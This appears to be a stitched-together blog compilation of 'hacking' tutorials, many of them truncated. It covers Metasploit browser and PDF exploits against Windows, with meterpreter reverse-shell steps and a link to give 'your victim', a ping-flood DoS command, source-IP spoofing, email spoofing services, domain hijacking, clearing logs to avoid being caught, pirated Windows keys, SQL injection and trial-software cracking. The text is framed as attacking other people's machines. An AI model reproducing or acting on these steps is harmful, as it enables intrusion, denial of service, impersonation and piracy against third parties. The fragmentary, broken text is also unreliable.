How to Hack Windows 7 using Metaspolit

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Requirement

metasploit

Windows 7

Open terminal type

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Exploit Targets

0 – Automatic (default)

1 – Internet Explorer 8

2 – Internet Explorer 7

3 – Internet Explorer 6

4 – Debug Target (Crash)

Requirement

Attacker: metasploit

Victim PC: Windows 7

Open terminal type

Hack Remote XP using Heap Overflow Attack

This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Hack Windows XP using Shell Link Code Execution

This module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Requirement

Attacker:metasploit

Victim PC: Windows XP

Open terminal type

Hack Remote PC with Operation Aurora Attack

Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.

The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.

Exploit Targets

0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)

1 – Adobe Reader v8.1.2 (Windows XP SP2 English

Requirement

Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/adobe_jbig2decode

Msf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4(IP of Local Host)

Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4(This must be an address on the local machine)

Msf exploit (adobe_jbig2decode)>set uripathakonsong(The Url to use for this exploit)

Msf exploit (adobe_jbig2decode)>exploit

Now an URL you should give to your victimhttp://192.168.1.4:8080/akonsong

When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF like picture below.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack remote PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

This module exploits vulnerability in the Smart Independent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version is assumed to be vulnerable as well.

Exploit Targets

0 – Automatic (default)

Requirement

Victim PC: Windows XP

Open backtrack terminal type

msfconsole

use exploit/windows/browser/adobe_cooltype_sing

Hack Remote PC using Sun Java Command Line Injection

Sun Java Web Start Plugin Command Line Argument Injection

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled

Exploit Targets

0 – Automatic (default)

1 – Java Runtime on Windows x86

Requirement

Attacker: metasploit

Victim PC: Windows XP

How to Hack Remote PC using pdf

Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.

Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)

Requirement

Attacker: metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/fileformat/adobe_flatedecode_predictor02

Msf exploit(adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp

Msf exploit(adobe_flatedecode_predictor02)>show options

Redirect Site to Another Site

A simple text file edit makes sites redirect to another. When you type address in address bar in any browser and enter it then it will display another web page, for example:- when you type Google.com you will be redirected to yahoo.com

Instructions to do:

1) Go to this directory [c:\windows\system32\drivers\etc], directory may change according to drive used for os installation
2) then hit enter
3) find a file named "hosts"
4) Right click on it and open with word pad.
5) In the last link of the document type the IP* address of yahoo space www.Google.com (Vice versa for other sites)
6) now save it
7) restart the browser if its already running
8) Now try it, It works perfect

IP*: to find IP address of that website Goto start ->Run > type cmd > enter. Now you have a new window on desktop. On that type this without cotes "ping www. yahoo.com"
replace yahoo.com with your preferred site and then enter it

How to Do Remote File Inclusion?

Remote File Inclusion (RFI)occurs when a remote file, usually a shell

(a graphical interface for browsing remote files and running your own code
on a server), is included into a website which allows the hacker to execute
server side commands as the current logged on user, and have access to
files on the server. With this power the hacker can continue on to use local
exploits to escalate his privileges and take over the whole system.

Many servers are vulnerable to this kind of attack because of PHP’s
default settings of register_globals and allow_url_fopen being enabled.
Although as of PHP 6.0, register_globals has been depreciated and
removed, many websites still rely on older versions of PHP to run their webapplications. Now let’s go through the steps a hacker would take to exploit
this type of vulnerability in a website..

DOS ATTACK ON WEBSITE.

DOWNLOAD TOOL FROM HERE.
ALTHOUGH IT SHOW THAT FILE IS VIRUS INFECTED ,BUT IT`S NOT.
PLACE I.P ADDRESS OR DOMAIN NAME OF THE WEBSITE &PRESS ENTER.

OR YOU CAN DO IT MANUALLY ALSO. JUST OPEN CMD & TYPE COMMAND.BUT IT`S OLD METHOD , SO I RECOMMEND YOU TO USE TOOL.

ping (Ip Address) -t -l 65000

IF YOU WANT TO KNOW MORE ABOUT IT. PLEASE READ FOLLOWING DOCUMENT.

IT HAS EXPLAINED EVERYTHING. CLICK HERE.

How to Find i.p Address of Remote computer?

This is the article about getting the IP address of the remote computer i.e in terms of hacking getting the IP address of the victim computer.

Before proceeding lets know something about IP address.

0x01-What is IP address?

IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication.

IP address serves for two basic purposes:

1. Host or network interface identification

2. Location Addressing

Using nmap to change a source address

Using nmap to change a source address. The commands used are:

nmap -iflist

...to get a list of available interfaces. When an interface is chosen (in this tutorial, eth0 is chosen) use the name of the interface in the next command:

nmap -e eth0 -S 192.168.1.100 192.168.1.109

...which will use the eth0 interface and spoof a source IP of 192.168.1.100, while scanning 192.168.1.109. Because the source address is spoofed, the return traffic from the target host will not be routed back to us. Thus, all ports will appear to be closed.

How To change your I.P address?

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.


1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".


2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:

Windows IP Configuration:

how to install metasploit in ubuntu?

(1)First download metasploit latest version from here for linux.

(2)next step is move this downloaded file into your home folder. we want to convert run file into executable file. so run following command into your terminal.

(3) sudo chmod +x metasploit-latest-linux-installer.run

(4)sudo ./metasploit-latest-linux-installer.run
after that uncompress process will start &  it will install automatically.
follow some basic step & get activaton code.
open terminal & run following command

(5)msfconcole 
it will show
msf>

List of Useful Hacking Tools

Here i am listing some good hacking free software which is very useful to hack any system.Download from  HERE.
(1)NESSUS-Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source, but they closed the source code in 2005 and removed the free "Registered Feed" version in 2008. It now costs $1,200 per year, which still beats many of its competitors. A free “Home Feed” is also available, though it is limited and only licensed for home network use.

Nessus is constantly updated, with more than 46,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a web-based interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. The open-source version of Nessus was forked by a group of users who still develop it under the OpenVAS name.

What is TELNET ? & How to Use TELNET?

Telnet: the Number One Hacker Tool

In this Guide you will learn:

·         What is telnet?

·         How to telnet

·         How to get telnet accounts <begin11c.shtml>

·         Why you might not want to telnet <begin11c.shtml>

·         How to install a telnet server on your home Windows computer <begin11c.shtml>

·         How to turn off a telnet server on your home Linux computer <begin11d.shtml>

·         How to explore computers using telnet <begin11d.shtml>

·         Why not use a portscanner instead? <begin11f.shtml>

·         How to break into web sites using telnet <begin11f.shtml>

"Where do I type that command?" People ask that all the time when they read my early Guides to (mostly) Harmless Hacking. I wrote those guides back when the Internet was in its infancy and almost everyone in cyberspace used telnet. However, nowadays you might never even hear about telnet, much less use it, unless you are a hacker. So if you are still wondering about telnet, today is your lucky day.

Domain Hijacking – How to Hijack a Domain

Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of domain name is as follows

Any website say for example gohacking.com consists of two parts. The domain name(gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.

How to Spoof an Email Addresses?

If you want to send email from your friend`s email address then you can use following services. keep in mind that it`s not actually send email from your friend`s mail address ,but the person who receive email  see your friend`s email address in sender

www.hoaxmail.co.uk

anonymailer.net 

emkei.cz
above all emkei.cz  is my favourite because it provide some advance option like email-header, reply to,cc etc.

You can also send from your cmd ,but for that purpose you need S.M.T.P server name  of your I.S.P. so use above services only for fun .

BSNL search & Reliance Mobile search

If you want to inquiry about any BSNL residential number, then it`s link below
http://dq.wdc.bsnl.co.in/bsnl-web/residentialSearch.seam

And if you want to know about details of any reliance number, there is below link.But unfortunately it is provide now only surname or First name.

http://myservices.relianceada.com/captureInstantRecharge.do

IP and Port scanning using ‘nmap (Network Mapper)’ in Ubuntu

Nmap is a powerful scanner available in Unix/Linux system. It’s very usefull for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine again single hosts.

It’s very easy to install nmap in Ubuntu, just download from the internet.

taufanlubis@zyrex:~$sudo apt-get install nmap

How to install Nmap 6.01 in Ubuntu from source?

1. Make sure you have bzip2 and g++installed. If not, tou can install them using the command

      sudo apt-get install bzip2 g++

2.Download nmap6.01 in any location of your choice. In this example we are going to assume that it
    is downloaded in ~/Downloads.

Online Hash Crackers

Cracker	Hashes
Tobtu	50,529,455,839
TMTO	36,436,233,567
MD5Decrypter(uk)	8,700,000,000
OnlineHashCrack	5,211,644,250
AuthSecu	500,000,000

how to clear log & become anonimous ?

Guyzz this is nt my tut but i wud like to share it coz its very important frall of us!!
Okay, let's begin!
1) How hackers get caught.

- First stuff that gives you away are "LOGS".
You need to know how events, application, and system logs work. If you dont, you can be easily caught!
The shell history will expose your actions.
Another giveaway is leaving a “:wq” in /var/log/messages or binarys.

google hack trick

Ok today i will show google hack demostration you'v never seen
before.
You will never find these fucking google hack codes on internet.
just watch and learn what i have discovered!!!

Ok it's time to show the secrets.

and this is the best google hack codes.

Speed of your bandwidh(internet speed)

Windows uses 20% of your bandwidth Here's how to Get it back

A nice little tweak for XP. Microsoft reserve 20% of your available bandwidth for their own purposes (suspect for updates and interrogating your machine etc..)

Here's how to get it back:

Click Start-->Run-->type "gpedit.msc" without the "

Top 20 terminal command of ubuntu

1. Kill a running application by its name

killall [app_name]

2. Display disk space usage:

df –h

3. Locate the installation directories of a program:

whereis [app]

How to change login screen of ubuntu 10.10?

Here is a way to change the looks of your login screen, it allows you to change the background, fonts and GTK theme using the Appearance Manager.



First open a Terminal window (Applications -> Accessories -> Terminal) then copy+paste the following line:

sudo cp /usr/share/applications/gnome-appearance-properties.desktop /usr/share/gdm/autostart/LoginWindow

Now close the Terminal window and logout, when logged out the Appearance window pops up. Here you can make the changes you want and when your done you can login as usual. To prevent the Appearance Manager from opening when you login, open a Terminal window (Applications -> Accessories -> Terminal) then copy+paste the following line:

sudo unlink /usr/share/gdm/autostart/LoginWindow/gnome-appearance-properties.desktop

USE NOKIA MOBILE AS MODEM IN UBUNTU

1 ) Connect Phone with USB, select PC Suite Mode on phone (even though you are not using PC suite as that is windows only).
2) Open Network Manager on Ubuntu, should show entry for mobile broadband.
3) Select Mobile broadband entry and use wizard to select details for network (i used AIRTEL)
4) Should now be able to select entry and connect to internet from network manager.

Windows-7 genuine key

22TKD-F8XX6-YG69F-9M66D-PMJBM
TWMF7-M387V-XKW4Y-PVQQD-RK7C8
HTJK6-DXX8T-TVCR6-KDG67-97J8Q
D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV

Insert Windows 7 disc
2. then open the disc and open source folder, and then open product.ini or search for product.ini in the disc.
3.you can now use these keys seen in the notepad.

FIRESHEEP TUTORIAL(HTTP SESSION HIJACKING)

Firesheep a Firefox addon has recently become very popular for easily carrying out a HTTP session hijacking attack. Http session hijacking attack can't be considered as a very sophisticated attack but needs some technical knowlegde to be performed . But Firesheep makes the attack a child's play. Firesheep was developed by Eric butler for Firefox, it was released at Toorcon 12 to demonstrate how serious cookie stealing can be.

Hacking website using SQL Injection -step by step guide

Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.



Some List of Database are:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,

Hack Software and Run the Trial Program Forever

In this post I’ll show you how to hack a Software and run the trial program forever. Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares. I’ll try to explain this in brief.